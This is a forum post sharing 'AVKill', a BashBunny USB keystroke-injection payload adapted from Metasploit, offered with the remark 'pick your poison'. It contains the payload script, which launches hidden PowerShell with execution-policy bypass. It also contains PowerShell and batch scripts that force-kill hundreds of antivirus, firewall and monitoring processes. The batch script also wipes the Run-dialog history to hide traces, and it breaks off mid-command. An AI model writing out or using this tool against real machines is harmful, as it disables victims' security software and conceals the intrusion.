InfoSecREDD Posted September 19, 2017 Share Posted September 19, 2017 Eh, I haven't been too active in awhile due to work so I figured I'd post one from my collection. AVKill - BashBunny This script was based off the Metasploit ruby code of "avkill". I just rewrote it for BashBunny. Payload.txt #!/bin/bash # # Title: AVKill # Author: # Version: 1.2.1 # Target: Windows 7-10 # # O===================O=================== # | Magenta | Setup # | Yellow | Excuting Script # | Green/Success | Script Completed # | Cyan | Cleaning Up/ # | | | Shutting down # | OFF | Ready for Removal # O======================================= # # This is based off of avkill.rb from metasploit framework, I managed to just take the processes out, # and convert them to both .cmd format AND .ps1 format. So pick your poison guys. Have fun! # # Setup BashBunny LED M SOLID source bunny_helpers.sh Q DELAY 5000 # Set BashBunny and Execute AVKill ATTACKMODE HID STORAGE LED Y VERYFAST Q GUI r Q DELAY 1000 Q STRING powershell -executionpolicy bypass -windowstyle hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\start.cmd')" Q ENTER LED SUCCESS Q DELAY 30000 # Starting syncing and shutdown sync -o LED C VERYFAST Q DELAY 3000 # Shutdown Command for BashBunny LED C SOLID shutdown 0 AVKill.ps1 Stop-Process -ProcessName AAWTray.exe -Force Stop-Process -ProcessName Ad-Aware.exe -Force Stop-Process -ProcessName MSASCui.exe -Force Stop-Process -ProcessName _avp32.exe -Force Stop-Process -ProcessName _avpcc.exe -Force Stop-Process -ProcessName _avpm.exe -Force Stop-Process -ProcessName aAvgApi.exe -Force Stop-Process -ProcessName ackwin32.exe -Force Stop-Process -ProcessName adaware.exe -Force Stop-Process -ProcessName advxdwin.exe -Force Stop-Process -ProcessName agentsvr.exe -Force Stop-Process -ProcessName agentw.exe -Force Stop-Process -ProcessName alertsvc.exe -Force Stop-Process -ProcessName alevir.exe -Force Stop-Process -ProcessName alogserv.exe -Force Stop-Process -ProcessName amon9x.exe -Force Stop-Process -ProcessName anti-trojan.exe -Force Stop-Process -ProcessName antivirus.exe -Force Stop-Process -ProcessName ants.exe -Force Stop-Process -ProcessName apimonitor.exe -Force Stop-Process -ProcessName aplica32.exe -Force Stop-Process -ProcessName apvxdwin.exe -Force Stop-Process -ProcessName arr.exe -Force Stop-Process -ProcessName atcon.exe -Force Stop-Process -ProcessName atguard.exe -Force Stop-Process -ProcessName atro55en.exe -Force Stop-Process -ProcessName atupdater.exe -Force Stop-Process -ProcessName atwatch.exe -Force Stop-Process -ProcessName au.exe -Force Stop-Process -ProcessName aupdate.exe -Force Stop-Process -ProcessName auto-protect.nav80try.exe -Force Stop-Process -ProcessName autodown.exe -Force Stop-Process -ProcessName autotrace.exe -Force Stop-Process -ProcessName autoupdate.exe -Force Stop-Process -ProcessName avconsol.exe -Force Stop-Process -ProcessName ave32.exe -Force Stop-Process -ProcessName avgcc32.exe -Force Stop-Process -ProcessName avgctrl.exe -Force Stop-Process -ProcessName avgemc.exe -Force Stop-Process -ProcessName avgnt.exe -Force Stop-Process -ProcessName avgrsx.exe -Force Stop-Process -ProcessName avgserv.exe -Force Stop-Process -ProcessName avgserv9.exe -Force Stop-Process -ProcessName avguard.exe -Force Stop-Process -ProcessName avgw.exe -Force Stop-Process -ProcessName avkpop.exe -Force Stop-Process -ProcessName avkserv.exe -Force Stop-Process -ProcessName avkservice.exe -Force Stop-Process -ProcessName avkwctl9.exe -Force Stop-Process -ProcessName avltmain.exe -Force Stop-Process -ProcessName avnt.exe -Force Stop-Process -ProcessName avp.exe -Force Stop-Process -ProcessName avp.exe -Force Stop-Process -ProcessName avp32.exe -Force Stop-Process -ProcessName avpcc.exe -Force Stop-Process -ProcessName avpdos32.exe -Force Stop-Process -ProcessName avpm.exe -Force Stop-Process -ProcessName avptc32.exe -Force Stop-Process -ProcessName avpupd.exe -Force Stop-Process -ProcessName avsched32.exe -Force Stop-Process -ProcessName avsynmgr.exe -Force Stop-Process -ProcessName avwin.exe -Force Stop-Process -ProcessName avwin95.exe -Force Stop-Process -ProcessName avwinnt.exe -Force Stop-Process -ProcessName avwupd.exe -Force Stop-Process -ProcessName avwupd32.exe -Force Stop-Process -ProcessName avwupsrv.exe -Force Stop-Process -ProcessName avxmonitor9x.exe -Force Stop-Process -ProcessName avxmonitornt.exe -Force Stop-Process -ProcessName avxquar.exe -Force Stop-Process -ProcessName backweb.exe -Force Stop-Process -ProcessName bargains.exe -Force Stop-Process -ProcessName bd_professional.exe -Force Stop-Process -ProcessName beagle.exe -Force Stop-Process -ProcessName belt.exe -Force Stop-Process -ProcessName bidef.exe -Force Stop-Process -ProcessName bidserver.exe -Force Stop-Process -ProcessName bipcp.exe -Force Stop-Process -ProcessName bipcpevalsetup.exe -Force Stop-Process -ProcessName bisp.exe -Force Stop-Process -ProcessName blackd.exe -Force Stop-Process -ProcessName blackice.exe -Force Stop-Process -ProcessName blink.exe -Force Stop-Process -ProcessName blss.exe -Force Stop-Process -ProcessName bootconf.exe -Force Stop-Process -ProcessName bootwarn.exe -Force Stop-Process -ProcessName borg2.exe -Force Stop-Process -ProcessName bpc.exe -Force Stop-Process -ProcessName brasil.exe -Force Stop-Process -ProcessName bs120.exe -Force Stop-Process -ProcessName bundle.exe -Force Stop-Process -ProcessName bvt.exe -Force Stop-Process -ProcessName ccapp.exe -Force Stop-Process -ProcessName ccevtmgr.exe -Force Stop-Process -ProcessName ccpxysvc.exe -Force Stop-Process -ProcessName cdp.exe -Force Stop-Process -ProcessName cfd.exe -Force Stop-Process -ProcessName cfgwiz.exe -Force Stop-Process -ProcessName cfiadmin.exe -Force Stop-Process -ProcessName cfiaudit.exe -Force Stop-Process -ProcessName cfinet.exe -Force Stop-Process -ProcessName cfinet32.exe -Force Stop-Process -ProcessName claw95.exe -Force Stop-Process -ProcessName claw95cf.exe -Force Stop-Process -ProcessName clean.exe -Force Stop-Process -ProcessName cleaner.exe -Force Stop-Process -ProcessName cleaner3.exe -Force Stop-Process -ProcessName cleanpc.exe -Force Stop-Process -ProcessName click.exe -Force Stop-Process -ProcessName cmd.exe -Force Stop-Process -ProcessName cmd32.exe -Force Stop-Process -ProcessName cmesys.exe -Force Stop-Process -ProcessName cmgrdian.exe -Force Stop-Process -ProcessName cmon016.exe -Force Stop-Process -ProcessName connectionmonitor.exe -Force Stop-Process -ProcessName cpd.exe -Force Stop-Process -ProcessName cpf9x206.exe -Force Stop-Process -ProcessName cpfnt206.exe -Force Stop-Process -ProcessName ctrl.exe -Force Stop-Process -ProcessName cv.exe -Force Stop-Process -ProcessName cwnb181.exe -Force Stop-Process -ProcessName cwntdwmo.exe -Force Stop-Process -ProcessName datemanager.exe -Force Stop-Process -ProcessName dcomx.exe -Force Stop-Process -ProcessName defalert.exe -Force Stop-Process -ProcessName defscangui.exe -Force Stop-Process -ProcessName defwatch.exe -Force Stop-Process -ProcessName deputy.exe -Force Stop-Process -ProcessName divx.exe -Force Stop-Process -ProcessName dllcache.exe -Force Stop-Process -ProcessName dllreg.exe -Force Stop-Process -ProcessName doors.exe -Force Stop-Process -ProcessName dpf.exe -Force Stop-Process -ProcessName dpfsetup.exe -Force Stop-Process -ProcessName dpps2.exe -Force Stop-Process -ProcessName drwatson.exe -Force Stop-Process -ProcessName drweb32.exe -Force Stop-Process -ProcessName drwebupw.exe -Force Stop-Process -ProcessName dssagent.exe -Force Stop-Process -ProcessName dvp95.exe -Force Stop-Process -ProcessName dvp95_0.exe -Force Stop-Process -ProcessName ecengine.exe -Force Stop-Process -ProcessName efpeadm.exe -Force Stop-Process -ProcessName emsw.exe -Force Stop-Process -ProcessName ent.exe -Force Stop-Process -ProcessName esafe.exe -Force Stop-Process -ProcessName escanhnt.exe -Force Stop-Process -ProcessName escanv95.exe -Force Stop-Process -ProcessName espwatch.exe -Force Stop-Process -ProcessName ethereal.exe -Force Stop-Process -ProcessName etrustcipe.exe -Force Stop-Process -ProcessName evpn.exe -Force Stop-Process -ProcessName exantivirus-cnet.exe -Force Stop-Process -ProcessName exe.avxw.exe -Force Stop-Process -ProcessName expert.exe -Force Stop-Process -ProcessName explore.exe -Force Stop-Process -ProcessName f-agnt95.exe -Force Stop-Process -ProcessName f-prot.exe -Force Stop-Process -ProcessName f-prot95.exe -Force Stop-Process -ProcessName f-stopw.exe -Force Stop-Process -ProcessName fameh32.exe -Force Stop-Process -ProcessName fast.exe -Force Stop-Process -ProcessName fch32.exe -Force Stop-Process -ProcessName fih32.exe -Force Stop-Process -ProcessName findviru.exe -Force Stop-Process -ProcessName firewall.exe -Force Stop-Process -ProcessName fnrb32.exe -Force Stop-Process -ProcessName fp-win.exe -Force Stop-Process -ProcessName fp-win_trial.exe -Force Stop-Process -ProcessName fprot.exe -Force Stop-Process -ProcessName frw.exe -Force Stop-Process -ProcessName fsaa.exe -Force Stop-Process -ProcessName fsav.exe -Force Stop-Process -ProcessName fsav32.exe -Force Stop-Process -ProcessName fsav530stbyb.exe -Force Stop-Process -ProcessName fsav530wtbyb.exe -Force Stop-Process -ProcessName fsav95.exe -Force Stop-Process -ProcessName fsgk32.exe -Force Stop-Process -ProcessName fsm32.exe -Force Stop-Process -ProcessName fsma32.exe -Force Stop-Process -ProcessName fsmb32.exe -Force Stop-Process -ProcessName gator.exe -Force Stop-Process -ProcessName gbmenu.exe -Force Stop-Process -ProcessName gbpoll.exe -Force Stop-Process -ProcessName generics.exe -Force Stop-Process -ProcessName gmt.exe -Force Stop-Process -ProcessName guard.exe -Force Stop-Process -ProcessName guarddog.exe -Force Stop-Process -ProcessName hacktracersetup.exe -Force Stop-Process -ProcessName hbinst.exe -Force Stop-Process -ProcessName hbsrv.exe -Force Stop-Process -ProcessName hotactio.exe -Force Stop-Process -ProcessName hotpatch.exe -Force Stop-Process -ProcessName htlog.exe -Force Stop-Process -ProcessName htpatch.exe -Force Stop-Process -ProcessName hwpe.exe -Force Stop-Process -ProcessName hxdl.exe -Force Stop-Process -ProcessName hxiul.exe -Force Stop-Process -ProcessName iamapp.exe -Force Stop-Process -ProcessName iamserv.exe -Force Stop-Process -ProcessName iamstats.exe -Force Stop-Process -ProcessName ibmasn.exe -Force Stop-Process -ProcessName ibmavsp.exe -Force Stop-Process -ProcessName icload95.exe -Force Stop-Process -ProcessName icloadnt.exe -Force Stop-Process -ProcessName icmon.exe -Force Stop-Process -ProcessName icsupp95.exe -Force Stop-Process -ProcessName icsuppnt.exe -Force Stop-Process -ProcessName idle.exe -Force Stop-Process -ProcessName iedll.exe -Force Stop-Process -ProcessName iedriver.exe -Force Stop-Process -ProcessName iexplorer.exe -Force Stop-Process -ProcessName iface.exe -Force Stop-Process -ProcessName ifw2000.exe -Force Stop-Process -ProcessName inetlnfo.exe -Force Stop-Process -ProcessName infus.exe -Force Stop-Process -ProcessName infwin.exe -Force Stop-Process -ProcessName init.exe -Force Stop-Process -ProcessName intdel.exe -Force Stop-Process -ProcessName intren.exe -Force Stop-Process -ProcessName iomon98.exe -Force Stop-Process -ProcessName istsvc.exe -Force Stop-Process -ProcessName jammer.exe -Force Stop-Process -ProcessName jdbgmrg.exe -Force Stop-Process -ProcessName jedi.exe -Force Stop-Process -ProcessName kavlite40eng.exe -Force Stop-Process -ProcessName kavpers40eng.exe -Force Stop-Process -ProcessName kavpf.exe -Force Stop-Process -ProcessName kazza.exe -Force Stop-Process -ProcessName keenvalue.exe -Force Stop-Process -ProcessName kerio-pf-213-en-win.exe -Force Stop-Process -ProcessName kerio-wrl-421-en-win.exe -Force Stop-Process -ProcessName kerio-wrp-421-en-win.exe -Force Stop-Process -ProcessName kernel32.exe -Force Stop-Process -ProcessName killprocesssetup161.exe -Force Stop-Process -ProcessName launcher.exe -Force Stop-Process -ProcessName ldnetmon.exe -Force Stop-Process -ProcessName ldpro.exe -Force Stop-Process -ProcessName ldpromenu.exe -Force Stop-Process -ProcessName ldscan.exe -Force Stop-Process -ProcessName lnetinfo.exe -Force Stop-Process -ProcessName loader.exe -Force Stop-Process -ProcessName localnet.exe -Force Stop-Process -ProcessName lockdown.exe -Force Stop-Process -ProcessName lockdown2000.exe -Force Stop-Process -ProcessName lookout.exe -Force Stop-Process -ProcessName lordpe.exe -Force Stop-Process -ProcessName lsetup.exe -Force Stop-Process -ProcessName luall.exe -Force Stop-Process -ProcessName luau.exe -Force Stop-Process -ProcessName lucomserver.exe -Force Stop-Process -ProcessName luinit.exe -Force Stop-Process -ProcessName luspt.exe -Force Stop-Process -ProcessName mapisvc32.exe -Force Stop-Process -ProcessName mcagent.exe -Force Stop-Process -ProcessName mcmnhdlr.exe -Force Stop-Process -ProcessName mcshield.exe -Force Stop-Process -ProcessName mctool.exe -Force Stop-Process -ProcessName mcupdate.exe -Force Stop-Process -ProcessName mcvsrte.exe -Force Stop-Process -ProcessName mcvsshld.exe -Force Stop-Process -ProcessName md.exe -Force Stop-Process -ProcessName mfin32.exe -Force Stop-Process -ProcessName mfw2en.exe -Force Stop-Process -ProcessName mfweng3.02d30.exe -Force Stop-Process -ProcessName mgavrtcl.exe -Force Stop-Process -ProcessName mgavrte.exe -Force Stop-Process -ProcessName mghtml.exe -Force Stop-Process -ProcessName mgui.exe -Force Stop-Process -ProcessName minilog.exe -Force Stop-Process -ProcessName mmod.exe -Force Stop-Process -ProcessName monitor.exe -Force Stop-Process -ProcessName moolive.exe -Force Stop-Process -ProcessName mostat.exe -Force Stop-Process -ProcessName mpfagent.exe -Force Stop-Process -ProcessName mpfservice.exe -Force Stop-Process -ProcessName mpftray.exe -Force Stop-Process -ProcessName mrflux.exe -Force Stop-Process -ProcessName msapp.exe -Force Stop-Process -ProcessName msbb.exe -Force Stop-Process -ProcessName msblast.exe -Force Stop-Process -ProcessName mscache.exe -Force Stop-Process -ProcessName msccn32.exe -Force Stop-Process -ProcessName mscman.exe -Force Stop-Process -ProcessName msconfig.exe -Force Stop-Process -ProcessName msdm.exe -Force Stop-Process -ProcessName msdos.exe -Force Stop-Process -ProcessName msiexec16.exe -Force Stop-Process -ProcessName msinfo32.exe -Force Stop-Process -ProcessName mslaugh.exe -Force Stop-Process -ProcessName msmgt.exe -Force Stop-Process -ProcessName msmsgri32.exe -Force Stop-Process -ProcessName mssmmc32.exe -Force Stop-Process -ProcessName mssys.exe -Force Stop-Process -ProcessName msvxd.exe -Force Stop-Process -ProcessName mu0311ad.exe -Force Stop-Process -ProcessName mwatch.exe -Force Stop-Process -ProcessName n32scanw.exe -Force Stop-Process -ProcessName nav.exe -Force Stop-Process -ProcessName navap.navapsvc.exe -Force Stop-Process -ProcessName navapsvc.exe -Force Stop-Process -ProcessName navapw32.exe -Force Stop-Process -ProcessName navdx.exe -Force Stop-Process -ProcessName navlu32.exe -Force Stop-Process -ProcessName navnt.exe -Force Stop-Process -ProcessName navstub.exe -Force Stop-Process -ProcessName navw32.exe -Force Stop-Process -ProcessName navwnt.exe -Force Stop-Process -ProcessName nc2000.exe -Force Stop-Process -ProcessName ncinst4.exe -Force Stop-Process -ProcessName ndd32.exe -Force Stop-Process -ProcessName neomonitor.exe -Force Stop-Process -ProcessName neowatchlog.exe -Force Stop-Process -ProcessName netarmor.exe -Force Stop-Process -ProcessName netd32.exe -Force Stop-Process -ProcessName netinfo.exe -Force Stop-Process -ProcessName netmon.exe -Force Stop-Process -ProcessName netscanpro.exe -Force Stop-Process -ProcessName netspyhunter-1.2.exe -Force Stop-Process -ProcessName netstat.exe -Force Stop-Process -ProcessName netutils.exe -Force Stop-Process -ProcessName nisserv.exe -Force Stop-Process -ProcessName nisum.exe -Force Stop-Process -ProcessName nmain.exe -Force Stop-Process -ProcessName nod32.exe -Force Stop-Process -ProcessName normist.exe -Force Stop-Process -ProcessName norton_internet_secu_3.0_407.exe -Force Stop-Process -ProcessName notstart.exe -Force Stop-Process -ProcessName npf40_tw_98_nt_me_2k.exe -Force Stop-Process -ProcessName npfmessenger.exe -Force Stop-Process -ProcessName nprotect.exe -Force Stop-Process -ProcessName npscheck.exe -Force Stop-Process -ProcessName npssvc.exe -Force Stop-Process -ProcessName nsched32.exe -Force Stop-Process -ProcessName nssys32.exe -Force Stop-Process -ProcessName nstask32.exe -Force Stop-Process -ProcessName nsupdate.exe -Force Stop-Process -ProcessName nt.exe -Force Stop-Process -ProcessName ntrtscan.exe -Force Stop-Process -ProcessName ntvdm.exe -Force Stop-Process -ProcessName ntxconfig.exe -Force Stop-Process -ProcessName nui.exe -Force Stop-Process -ProcessName nupgrade.exe -Force Stop-Process -ProcessName nvarch16.exe -Force Stop-Process -ProcessName nvc95.exe -Force Stop-Process -ProcessName nvsvc32.exe -Force Stop-Process -ProcessName nwinst4.exe -Force Stop-Process -ProcessName nwservice.exe -Force Stop-Process -ProcessName nwtool16.exe -Force Stop-Process -ProcessName ollydbg.exe -Force Stop-Process -ProcessName onsrvr.exe -Force Stop-Process -ProcessName optimize.exe -Force Stop-Process -ProcessName ostronet.exe -Force Stop-Process -ProcessName otfix.exe -Force Stop-Process -ProcessName outpost.exe -Force Stop-Process -ProcessName outpostinstall.exe -Force Stop-Process -ProcessName outpostproinstall.exe -Force Stop-Process -ProcessName padmin.exe -Force Stop-Process -ProcessName panixk.exe -Force Stop-Process -ProcessName patch.exe -Force Stop-Process -ProcessName pavcl.exe -Force Stop-Process -ProcessName pavproxy.exe -Force Stop-Process -ProcessName pavsched.exe -Force Stop-Process -ProcessName pavw.exe -Force Stop-Process -ProcessName pccwin98.exe -Force Stop-Process -ProcessName pcfwallicon.exe -Force Stop-Process -ProcessName pcip10117_0.exe -Force Stop-Process -ProcessName pcscan.exe -Force Stop-Process -ProcessName pdsetup.exe -Force Stop-Process -ProcessName periscope.exe -Force Stop-Process -ProcessName persfw.exe -Force Stop-Process -ProcessName perswf.exe -Force Stop-Process -ProcessName pf2.exe -Force Stop-Process -ProcessName pfwadmin.exe -Force Stop-Process -ProcessName pgmonitr.exe -Force Stop-Process -ProcessName pingscan.exe -Force Stop-Process -ProcessName platin.exe -Force Stop-Process -ProcessName pop3trap.exe -Force Stop-Process -ProcessName poproxy.exe -Force Stop-Process -ProcessName popscan.exe -Force Stop-Process -ProcessName portdetective.exe -Force Stop-Process -ProcessName portmonitor.exe -Force Stop-Process -ProcessName powerscan.exe -Force Stop-Process -ProcessName ppinupdt.exe -Force Stop-Process -ProcessName pptbc.exe -Force Stop-Process -ProcessName ppvstop.exe -Force Stop-Process -ProcessName prizesurfer.exe -Force Stop-Process -ProcessName prmt.exe -Force Stop-Process -ProcessName prmvr.exe -Force Stop-Process -ProcessName procdump.exe -Force Stop-Process -ProcessName processmonitor.exe -Force Stop-Process -ProcessName procexplorerv1.0.exe -Force Stop-Process -ProcessName programauditor.exe -Force Stop-Process -ProcessName proport.exe -Force Stop-Process -ProcessName protectx.exe -Force Stop-Process -ProcessName pspf.exe -Force Stop-Process -ProcessName purge.exe -Force Stop-Process -ProcessName qconsole.exe -Force Stop-Process -ProcessName qserver.exe -Force Stop-Process -ProcessName rapapp.exe -Force Stop-Process -ProcessName rav7.exe -Force Stop-Process -ProcessName rav7win.exe -Force Stop-Process -ProcessName rav8win32eng.exe -Force Stop-Process -ProcessName ray.exe -Force Stop-Process -ProcessName rb32.exe -Force Stop-Process -ProcessName rcsync.exe -Force Stop-Process -ProcessName realmon.exe -Force Stop-Process -ProcessName reged.exe -Force Stop-Process -ProcessName regedit.exe -Force Stop-Process -ProcessName regedt32.exe -Force Stop-Process -ProcessName rescue.exe -Force Stop-Process -ProcessName rescue32.exe -Force Stop-Process -ProcessName rrguard.exe -Force Stop-Process -ProcessName rshell.exe -Force Stop-Process -ProcessName rtvscan.exe -Force Stop-Process -ProcessName rtvscn95.exe -Force Stop-Process -ProcessName rulaunch.exe -Force Stop-Process -ProcessName run32dll.exe -Force Stop-Process -ProcessName rundll.exe -Force Stop-Process -ProcessName rundll16.exe -Force Stop-Process -ProcessName ruxdll32.exe -Force Stop-Process -ProcessName safeweb.exe -Force Stop-Process -ProcessName sahagent.exe -Force Stop-Process -ProcessName save.exe -Force Stop-Process -ProcessName savenow.exe -Force Stop-Process -ProcessName sbserv.exe -Force Stop-Process -ProcessName sc.exe -Force Stop-Process -ProcessName scam32.exe -Force Stop-Process -ProcessName scan32.exe -Force Stop-Process -ProcessName scan95.exe -Force Stop-Process -ProcessName scanpm.exe -Force Stop-Process -ProcessName scrscan.exe -Force Stop-Process -ProcessName serv95.exe -Force Stop-Process -ProcessName setup_flowprotector_us.exe -Force Stop-Process -ProcessName setupvameeval.exe -Force Stop-Process -ProcessName sfc.exe -Force Stop-Process -ProcessName sgssfw32.exe -Force Stop-Process -ProcessName sh.exe -Force Stop-Process -ProcessName shellspyinstall.exe -Force Stop-Process -ProcessName shn.exe -Force Stop-Process -ProcessName showbehind.exe -Force Stop-Process -ProcessName smc.exe -Force Stop-Process -ProcessName sms.exe -Force Stop-Process -ProcessName smss32.exe -Force Stop-Process -ProcessName soap.exe -Force Stop-Process -ProcessName sofi.exe -Force Stop-Process -ProcessName sperm.exe -Force Stop-Process -ProcessName spf.exe -Force Stop-Process -ProcessName sphinx.exe -Force Stop-Process -ProcessName spoler.exe -Force Stop-Process -ProcessName spoolcv.exe -Force Stop-Process -ProcessName spoolsv32.exe -Force Stop-Process -ProcessName spyxx.exe -Force Stop-Process -ProcessName srexe.exe -Force Stop-Process -ProcessName srng.exe -Force Stop-Process -ProcessName ss3edit.exe -Force Stop-Process -ProcessName ssg_4104.exe -Force Stop-Process -ProcessName ssgrate.exe -Force Stop-Process -ProcessName st2.exe -Force Stop-Process -ProcessName start.exe -Force Stop-Process -ProcessName stcloader.exe -Force Stop-Process -ProcessName supftrl.exe -Force Stop-Process -ProcessName support.exe -Force Stop-Process -ProcessName supporter5.exe -Force Stop-Process -ProcessName svc.exe -Force Stop-Process -ProcessName svchostc.exe -Force Stop-Process -ProcessName svchosts.exe -Force Stop-Process -ProcessName svshost.exe -Force Stop-Process -ProcessName sweep95.exe -Force Stop-Process -ProcessName sweepnet.sweepsrv.sys.swnetsup.exe -Force Stop-Process -ProcessName symproxysvc.exe -Force Stop-Process -ProcessName symtray.exe -Force Stop-Process -ProcessName sysedit.exe -Force Stop-Process -ProcessName system.exe -Force Stop-Process -ProcessName system32.exe -Force Stop-Process -ProcessName sysupd.exe -Force Stop-Process -ProcessName taskmg.exe -Force Stop-Process -ProcessName taskmgr.exe -Force Stop-Process -ProcessName taskmo.exe -Force Stop-Process -ProcessName taskmon.exe -Force Stop-Process -ProcessName taumon.exe -Force Stop-Process -ProcessName tbscan.exe -Force Stop-Process -ProcessName tc.exe -Force Stop-Process -ProcessName tca.exe -Force Stop-Process -ProcessName tcm.exe -Force Stop-Process -ProcessName tds-3.exe -Force Stop-Process -ProcessName tds2-98.exe -Force Stop-Process -ProcessName tds2-nt.exe -Force Stop-Process -ProcessName teekids.exe -Force Stop-Process -ProcessName tfak.exe -Force Stop-Process -ProcessName tfak5.exe -Force Stop-Process -ProcessName tgbob.exe -Force Stop-Process -ProcessName titanin.exe -Force Stop-Process -ProcessName titaninxp.exe -Force Stop-Process -ProcessName tracert.exe -Force Stop-Process -ProcessName trickler.exe -Force Stop-Process -ProcessName trjscan.exe -Force Stop-Process -ProcessName trjsetup.exe -Force Stop-Process -ProcessName trojantrap3.exe -Force Stop-Process -ProcessName tsadbot.exe -Force Stop-Process -ProcessName tvmd.exe -Force Stop-Process -ProcessName tvtmd.exe -Force Stop-Process -ProcessName undoboot.exe -Force Stop-Process -ProcessName updat.exe -Force Stop-Process -ProcessName update.exe -Force Stop-Process -ProcessName upgrad.exe -Force Stop-Process -ProcessName utpost.exe -Force Stop-Process -ProcessName vbcmserv.exe -Force Stop-Process -ProcessName vbcons.exe -Force Stop-Process -ProcessName vbust.exe -Force Stop-Process -ProcessName vbwin9x.exe -Force Stop-Process -ProcessName vbwinntw.exe -Force Stop-Process -ProcessName vcsetup.exe -Force Stop-Process -ProcessName vet32.exe -Force Stop-Process -ProcessName vet95.exe -Force Stop-Process -ProcessName vettray.exe -Force Stop-Process -ProcessName vfsetup.exe -Force Stop-Process -ProcessName vir-help.exe -Force Stop-Process -ProcessName virusmdpersonalfirewall.exe -Force Stop-Process -ProcessName vnlan300.exe -Force Stop-Process -ProcessName vnpc3000.exe -Force Stop-Process -ProcessName vpc32.exe -Force Stop-Process -ProcessName vpc42.exe -Force Stop-Process -ProcessName vpfw30s.exe -Force Stop-Process -ProcessName vptray.exe -Force Stop-Process -ProcessName vscan40.exe -Force Stop-Process -ProcessName vscenu6.02d30.exe -Force Stop-Process -ProcessName vsched.exe -Force Stop-Process -ProcessName vsecomr.exe -Force Stop-Process -ProcessName vshwin32.exe -Force Stop-Process -ProcessName vsisetup.exe -Force Stop-Process -ProcessName vsmain.exe -Force Stop-Process -ProcessName vsmon.exe -Force Stop-Process -ProcessName vsstat.exe -Force Stop-Process -ProcessName vswin9xe.exe -Force Stop-Process -ProcessName vswinntse.exe -Force Stop-Process -ProcessName vswinperse.exe -Force Stop-Process -ProcessName w32dsm89.exe -Force Stop-Process -ProcessName w9x.exe -Force Stop-Process -ProcessName watchdog.exe -Force Stop-Process -ProcessName webdav.exe -Force Stop-Process -ProcessName webscanx.exe -Force Stop-Process -ProcessName webtrap.exe -Force Stop-Process -ProcessName wfindv32.exe -Force Stop-Process -ProcessName whoswatchingme.exe -Force Stop-Process -ProcessName wimmun32.exe -Force Stop-Process -ProcessName win-bugsfix.exe -Force Stop-Process -ProcessName win32.exe -Force Stop-Process -ProcessName win32us.exe -Force Stop-Process -ProcessName winactive.exe -Force Stop-Process -ProcessName window.exe -Force Stop-Process -ProcessName windows.exe -Force Stop-Process -ProcessName wininetd.exe -Force Stop-Process -ProcessName wininitx.exe -Force Stop-Process -ProcessName winlogin.exe -Force Stop-Process -ProcessName winmain.exe -Force Stop-Process -ProcessName winnet.exe -Force Stop-Process -ProcessName winppr32.exe -Force Stop-Process -ProcessName winrecon.exe -Force Stop-Process -ProcessName winservn.exe -Force Stop-Process -ProcessName winssk32.exe -Force Stop-Process -ProcessName winstart.exe -Force Stop-Process -ProcessName winstart001.exe -Force Stop-Process -ProcessName wintsk32.exe -Force Stop-Process -ProcessName winupdate.exe -Force Stop-Process -ProcessName wkufind.exe -Force Stop-Process -ProcessName wnad.exe -Force Stop-Process -ProcessName wnt.exe -Force Stop-Process -ProcessName wradmin.exe -Force Stop-Process -ProcessName wrctrl.exe -Force Stop-Process -ProcessName wsbgate.exe -Force Stop-Process -ProcessName wupdater.exe -Force Stop-Process -ProcessName wupdt.exe -Force Stop-Process -ProcessName wyvernworksfirewall.exe -Force Stop-Process -ProcessName xpf202en.exe -Force Stop-Process -ProcessName zapro.exe -Force Stop-Process -ProcessName zapsetup3001.exe -Force Stop-Process -ProcessName zatutor.exe -Force Stop-Process -ProcessName zonalm2601.exe -Force Stop-Process -ProcessName zonealarm.exe -Force OR AVKill.cmd @echo off cls REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f Taskkill /T /F /IM AAWTray.exe /IM Ad-Aware.exe /IM MSASCui.exe /IM _avp32.exe /IM _avpcc.exe /IM _avpm.exe /IM aAvgApi.exe /IM ackwin32.exe /IM adaware.exe /IM advxdwin.exe Taskkill /T /F /IM agentsvr.exe /IM agentw.exe /IM alertsvc.exe /IM alevir.exe /IM alogserv.exe /IM amon9x.exe /IM anti-trojan.exe /IM antivirus.exe /IM ants.exe /IM apimonitor.exe Taskkill /T /F /IM aplica32.exe /IM apvxdwin.exe /IM arr.exe /IM atcon.exe /IM atguard.exe /IM atro55en.exe /IM atupdater.exe /IM atwatch.exe /IM au.exe /IM aupdate.exe Taskkill /T /F /IM auto-protect.nav80try.exe /IM autodown.exe /IM autotrace.exe /IM autoupdate.exe /IM avconsol.exe /IM ave32.exe /IM avgcc32.exe /IM avgctrl.exe /IM avgemc.exe Taskkill /T /F /IM avgnt.exe /IM avgrsx.exe /IM avgserv.exe /IM avgserv9.exe /IM avguard.exe /IM avgw.exe /IM avkpop.exe /IM avkserv.exe /IM avkservice.exe /IM avkwctl9.exe Taskkill /T /F /IM avltmain.exe /IM avnt.exe /IM avp.exe /IM avp.exe /IM avp32.exe /IM avpcc.exe /IM avpdos32.exe /IM avpm.exe /IM avptc32.exe /IM avpupd.exe /IM avsched32.exe Taskkill /T /F /IM avsynmgr.exe /IM avwin.exe /IM avwin95.exe /IM avwinnt.exe /IM avwupd.exe /IM avwupd32.exe /IM avwupsrv.exe /IM avxmonitor9x.exe /IM avxmonitornt.exe Taskkill /T /F /IM avxquar.exe /IM backweb.exe /IM bargains.exe /IM bd_professional.exe /IM beagle.exe /IM belt.exe /IM bidef.exe /IM bidserver.exe /IM bipcp.exe /IM bipcpevalsetup.exe Taskkill /T /F /IM bisp.exe /IM blackd.exe /IM blackice.exe /IM blink.exe /IM blss.exe /IM bootconf.exe /IM bootwarn.exe /IM borg2.exe /IM bpc.exe /IM brasil.exe /IM bs120.exe Taskkill /T /F /IM bundle.exe /IM bvt.exe /IM ccapp.exe /IM ccevtmgr.exe /IM ccpxysvc.exe /IM cdp.exe /IM cfd.exe /IM cfgwiz.exe /IM cfiadmin.exe /IM cfiaudit.exe /IM cfinet.exe Taskkill /T /F /IM cfinet32.exe /IM claw95.exe /IM claw95cf.exe /IM clean.exe /IM cleaner.exe /IM cleaner3.exe /IM cleanpc.exe /IM click.exe /IM cmesys.exe Taskkill /T /F /IM cmgrdian.exe /IM cmon016.exe /IM connectionmonitor.exe /IM cpd.exe /IM cpf9x206.exe /IM cpfnt206.exe /IM ctrl.exe /IM cv.exe /IM cwnb181.exe /IM cwntdwmo.exe Taskkill /T /F /IM datemanager.exe /IM dcomx.exe /IM defalert.exe /IM defscangui.exe /IM defwatch.exe /IM deputy.exe /IM divx.exe /IM dllcache.exe /IM dllreg.exe /IM doors.exe Taskkill /T /F 